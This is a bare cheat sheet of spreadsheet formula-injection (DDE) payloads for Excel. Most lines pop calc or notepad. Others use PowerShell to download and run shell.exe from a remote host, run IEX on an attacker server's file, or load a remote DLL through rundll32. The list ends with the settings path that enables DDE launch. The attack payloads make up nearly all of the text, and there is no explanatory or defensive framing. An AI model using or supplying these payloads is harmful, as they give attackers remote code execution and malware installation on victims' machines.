=cmd|’ /C powershell Invoke-WebRequest “http://192.168.0.8:8/shell.exe” -OutFile “$env:Tempshell.exe”; Start-Process “$env:Tempshell.exe”‘!A1
=cmd|' /C powershell Invoke-WebRequest "http://192.168.0.8:8/shell.exe" -OutFile "$env:Tempshell.exe"; Start-Process "$env:Tempshell.exe"'!A1

=cmd|’ /C calc’!A1
=cmd|' /C calc'!A1

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
=SUM(1+2)*cmd|' /C calc '!A0
@sum(1+2)*cmd|' /C calc'!A0
+sum(1+2)*cmd|' /C calc'!A0
-sum(1+2)*cmd|' /C calc'!A0

# HYPERLINK(link_location, [friendly_name])
=HYPERLINK("http://www.google.com", "Safe Site")
=WEBSERVICE("http://example.com/payload.txt")
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''

File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch

